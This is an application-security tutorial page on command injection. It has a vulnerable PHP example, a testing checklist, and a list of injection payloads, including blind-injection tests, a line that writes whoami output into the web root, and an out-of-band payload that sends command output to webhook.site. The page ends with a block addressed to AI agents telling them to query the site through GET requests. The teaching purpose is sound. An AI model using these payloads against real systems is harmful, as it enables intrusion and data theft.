# Command injection ## What is it? Command injection is a vulnerability that allows an attacker to manipulate an application to execute arbitrary system commands on the server. This occurs when an application passes unsafe data, often user input, to a system shell. **A simple example** A vulnerable web application might take a path from a query parameter and use it to read a file, like so: ``` $file = $_GET['file']; system("cat /var/www/html/$file"); ``` If an attacker uses a payload such as `; ls -la` in the `file` parameter, they can make the application execute an additional command that lists all files in the current directory. The server then executes the `cat` command and the `ls` command and the attacker receives a list of all files in the current directory. Command injection can often lead to: * Remote code execution * Denial of Service * Data breach * Privilege escalation **Other learning resources:** * PortSwigger: * OWASP: **Writeups:** * Bullets ## Checklist * [ ] Determine the technology stack: Which operating system and server software are in use? * [ ] Identify potential injection points: URL parameters, form fields, HTTP headers, etc. * [ ] Test for simple injections with special characters like ;, &&, ||, and |. Test for injection within command arguments. * [ ] Test for blind command injection, where output is not returned in the response. If output isn't directly visible, try creating outbound requests (e.g. using ping or curl). * [ ] Try to escape from any restriction mechanisms, like quotes or double quotes. * [ ] Test with a list of potentially dangerous functions/methods (like exec(), system(), passthru() in PHP, or exec, eval in Node.js). * [ ] Test for command injection using time delays (ping -c localhost). * [ ] Test for command injection using &&, ||, and ;. * [ ] Test with common command injection payloads, such as those from PayloadsAllTheThings. * [ ] If there's a filter in place, try to bypass it using various techniques like encoding, command splitting, etc. ## Exploitation Basic command chaining ``` ; ls -la ``` Using logic operators ``` && ls -la ``` Commenting out the rest of a command ``` ; ls -la # ``` Using a pipe for command chaining ``` | ls -la ``` Testing for blind injection ``` ; sleep 10 ; ping -c 10 127.0.0.1 & whoami > /var/www/html/whoami.txt & ``` Out-of-band testing ``` & nslookup webhook.site/?`whoami` & ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/command-injection.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.